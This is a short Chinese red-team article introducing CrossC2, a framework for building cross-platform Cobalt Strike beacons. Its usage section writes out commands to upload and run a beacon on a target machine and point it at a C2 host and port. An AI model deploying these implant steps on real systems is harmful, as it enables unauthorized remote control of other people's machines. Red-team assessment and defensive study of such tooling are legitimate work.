免责声明
本公众号所提供的文字和信息仅供学习和研究使用,请读者自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
工具介绍
面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/...)的安全评估,支持自定义模块,及包含一些常用的渗透模块。
受限说明:
- CobaltStrike: 暂时仅支持3.14最后一个版本(bug fixs), 以及4.x版本(详见cs4.1分支).
- Linux: 特别老旧的系统可以选择cna中的"Linux-GLIBC"选项(2010年左右)
- MacOS: 新系统仅支持64位程序
- iOS: sandbox
- Embedded: only *nix
工具使用
在目标机上运行CrossC2插件生成的一键在线脚本将beacon上传到目标机进行赋权操作后设置 beacon 的工作目录并运行:exportCCPATH=/opt/&&/tmp/c2暂时指定beacon的协议库并运行:/tmp/c2 /tmp/c2-rebind.so临时设置信标的C2配置:exportCCHOST=127.0.0.1&&exportCCPORT=443&&/tmp/c2设置DEBUG查看beacon在线状态:exportCCDEBUG=1&&/tmp/c2
下载链接
End
原文始发于微信公众号(贝雷帽SEC):【红队】CrossC2框架,生成CS的跨平台beacon
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论